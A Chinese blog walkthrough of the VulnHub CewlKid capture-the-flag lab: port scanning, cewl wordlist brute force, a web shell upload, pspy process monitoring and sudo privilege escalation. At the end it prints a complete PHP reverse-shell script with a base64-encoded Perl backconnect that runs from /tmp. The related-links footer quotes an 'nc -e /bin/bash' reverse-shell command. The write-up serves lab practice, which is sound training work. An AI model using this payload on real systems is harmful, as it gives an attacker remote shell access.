VulnHub-CewlKid

最新推荐文章于 2023-06-08 22:11:15 发布
最新推荐文章于 2023-06-08 22:11:15 发布
阅读量308 收藏 1
点赞数 1
分类专栏: 内网渗透 VulnHub 文章标签: linux 安全 ubuntu shell php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sanqin_/article/details/109839998
版权

靶机 DHCP 未能正确分配 IP :看这里
靶机地址:http://www.vulnhub.com/entry/cewlkid-1,559/

按照正常流程

nmap -sV ip

在这里插入图片描述
发现开放三个端口
22端口:ssh
80端口:浏览器打开是阿帕奇
8080端口:浏览器打开是网页

查看8080端口的网页,在 F12发现一串密文
在这里插入图片描述
尝试使用常用的解码方式解密无果后,先保存下来

发现有登入页面,在尝试常用万能密码无法登入后,
使用使用爬虫创建自字典的工具

cewl http://192.168.1.126:8080 > key.lst

然后bp抓取登入信息,使用字典爆破
在这里插入图片描述
点击爆破,找到密码,Letraset
在这里插入图片描述
登入页面后,发现有文件上传的页面
在这里插入图片描述
上传一个php反弹shell的脚本,脚本置于文章末尾
nc -lvp port监听,curl 访问脚本,拿到shell,不过权限不高

并且用 python建立虚拟终端

python -c 'import pty; pty.spawn("/bin/bash")'

提权:
方法:一
在这里插入图片描述
逛了一圈没看见有价值的

使用 pspy64 查看一下进程
因为网页上传文件失败所以使用wget去kali本地下载

kali:
	python3 -m http.server port
靶机:
	cd /tmp
	wget http://ip:port/pspy64s
	chmod 777 pspy64s
	./pspy64s

可以看见一行比较重要的的,尝试登入他的用户
在这里插入图片描述

su cewlbeans 			//登入用户
sudo -l					//查看权限
sudo su					//申请临时root

在这里插入图片描述

通关
在这里插入图片描述
方法:二
查看版本系统版本后,构建提权脚本提权

php反弹shell(记得改ip和端口),来源:网络

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
阿杰_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub-driftinghlues2
weixin_50901557的博客
12-05 341
靶机地址:http://www.vulnhub.com/entry/driftingblues-2,634/使用arp-scan -I确定靶机的IP 确定IP后,用nmap扫描 21端口开放ftp,22端口开发ssh,80端口开放http 扫一下目录 发现是WordPress框架搭建,但无法正确访问IP可以跳转域名,判断是DNS没有解析 hosts文件位置在:C:\windows\system32\drivers\etc 扫描出了后台登录页面 使用 wpscan 获取账号密码使用wpscan扫描一下wpsc
VulnHub—Os-Hax
weixin_39219503的博客
01-05 382
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hax,389/ 题目信息如下,难度中等 Back To The Top Difficulty : Intermediate Flag : boot-root Learing : exploit | web application Security | Privilege Es...
VulnHub靶场之CEWLKID: 1
A_dmin的博客
12-02 466
VulnHub靶场之CEWLKID: 1 扫描IP以及端口: 访问80端口,没啥,目录扫描,也没啥: 访问8080端口,sitemagic CMS???国外的么: 扫一下目录,有个info.php: 还有个登录页面: 去搜一个相关漏洞,发现好像存在一个任意文件上传: 不过好像要登陆才行,就很难受,不然会直接跳转到首页,,, 利用cewl生成字典: 爆破: 登录,上传shell文件: 监听拿shell,路径:http://192.168.1.17:8080/files/images/she
vulnhub Funbox: Under Construction
箭雨镜屋
05-28 544
渗透思路:nmap扫描端口----dirb扫描网站目录----利用osCommerce v2.3.4.1的rce漏洞getshell----pspy64s发现定时任务----信息泄漏获得root密码----su输入密码提权
渗透测试--GROTESQUE: 2漏洞复现
qq_59589136的博客
06-08 142
4、编辑网卡配置文件vi /etc/network/interfaces,在vi命令模式下,是不能直接编辑文本的,输入的字母会被当做命令执行,按i,切换到插入模式,进行文本编辑,esc退出编辑模式。由于我的版本过低,原来是没有pspy64s这个工具包,需要下载安装到kali攻击机上,但是又显glibc版本过低,需要下载高一点的版本。命令:for i in {23..556};下载安装时又显示bison太旧,需要更新升级,发现是没有安装bison的,安装过程又需要连接到github安装工具,最后成功。
靶场练习第十九天~vulnhub靶场之GreenOptic: 1
qq_57976347的博客
02-18 774
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:GreenOptic: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -sV 192.168.101.123 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息
vulnhub靶场5:red
Genarior的专栏
05-04 138
17、赋权后,执行该工具,找到了后面文件,该源码文件会被定时编译,并执行,发现后面程序,在/var/www/wordpress/.git/目录下,该文件执行具有root权限。12、发现可以使用ippsec账户,执行/usr/bin/time命令,于是切换到ippsec用户,并反弹shell,在ippsec用户反馈的shell不会被定时清除。8、由于是php,所以读取配置文件,wp-config.php,得到如下信息,使用ssh登录,无法登录,由于前面提到hashcat,考虑通过碰撞进行爆破。
Vulnhub靶场】Red:1
Nailaoyyds的博客
06-14 1469
目录前期配置​记一次kali双网卡IP不显示问题环境介绍一、信息收集nmap扫描 寻找线索 后门文件爆破 参数爆破 文件包含利用 filter伪协议 远程连接 权限提升 会话维持pspy64s监听 反弹shell代码 前期配置 记一次kali双网卡IP不显示问题 添加网卡适配器配置网卡编辑器 开启网卡 网络配置中添加eth1网卡 重启网络服务,已经获取到IP 一、信息收集 nmap扫描 访问IP 确定靶机位置 点击search会跳转到一个域名 修改hosts解析使它正常访问wi
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
vulnhub-Nagini.txt
06-10
Nagini
Python-PSPy一个简单的Python27AWSLambda函数
08-10
PSPy 一个简单的Python 2.7 AWS Lambda函数,用于执行PowerShell binary和编组输入/输出到PowerShell
pspy:在没有root权限的情况下监视linux进程
03-31
pspy-无特权Linux进程监听 pspy是一种命令行工具,旨在无需根权限就可以窥探进程。 它允许您在其他用户执行命令时查看它们,cron作业等。 非常适合枚举CTF中Linux系统。 很好地向您的同事展示为什么在命令行中将秘密作为参数传递是一个坏主意。 该工具从procfs扫描中收集信息。 放置在文件系统选定部分上的Inotify观察程序将触发这些扫描,以捕获短暂的进程。 入门 下载 将工具安装到要检查Linux机器上。 首先获取二进制文件。 在此处下载发布的二进制文件: 32位大,静态版本: pspy32 64位大,静态版本: pspy64 32位小版本: pspy32s 64位小版本: pspy64s 静态编译的文件应可在任何Linux系统上使用,但容量很大(〜4MB)。 如果有大小问题,请尝试较小的版本,该版本取决于libc并使用UPX(〜1MB)压缩。 建造 您可以使用系
Hackthebox e Vulnhub - Dicas e Truques.pdf
最新发布
10-06
网络安全渗透测试
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
**VulnHub Walkthroughs: Alienum 演练详解** 在网络安全领域,VulnHub 是一个深受爱好者和专业人员欢迎的平台,它提供了一系列虚拟机(VM)镜像,用于模拟真实的网络环境,帮助用户提升漏洞利用和渗透测试的技能。...
靶机渗透练习17-Red
hirak0的博客
04-16 1794
靶机描述 靶机地址:https://www.vulnhub.com/entry/napping-101,752/ Description Even Admins can fall asleep on the job This works better with VirtualBox rather than VMware ## Changelog v1.0.1 - 2021-10-30 v1.0.0 - 2021-10-22 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机:
靶机练习No.19 VulnHub靶机 Red-1目录扫出后门,wfuzz 枚举参数,filter协议读取数据库源码,hashcat解密 time提权 .c后门反弹shell
YouthBelief的博客
01-14 1977
0x00 环境准备 下载地址: https://www.vulnhub.com/entry/red-1,753/ virtual box 导入靶机 难度:中 靶机上架时间:2021年11月3日 提示:Red has taken over your system, are you able to regain control? 红色已经控制了你的系统,你能重新控制吗? 0x01 信息收集 靶机ip探测 端口服务识别 扫出开放 22和80端口, 80端口wordpress 5.8
VulnHub渗透实战--Billu_b0x
crispr的博客
02-05 954
Billu_b0x 0X01 Main Point 1.简单的代码审计 2. 文件包含漏洞(LFI) 读取源码 3. 文件上传得到webshell 4. Linux内核提权(Ubuntu 12.04) 5. SQLI 0X02 前期嗅探和端口探测 arp-scan -l #得到靶机IP nmap -sV -A -p- 172.20.10.3 #探测靶机端口及系统情况 常规的开放...
vulnhub | BROKEN-2020: 1
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
09-07 443
文章目录总结前言开始 总结 - 0. arp 扫描 | netdiscover -i eth0 | arp-scan --interface=eth0 --localnet - 0.1 查看定时任务 | cat /etc/crontab - 1. python 开启一个http服务器 | python3 -m http.server 8080 - 2. nc 开启监听 | nc -lvp 4444 - 3. nc 反弹shell | nc -e /bin/bash 10.0.2.4 4444 -
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值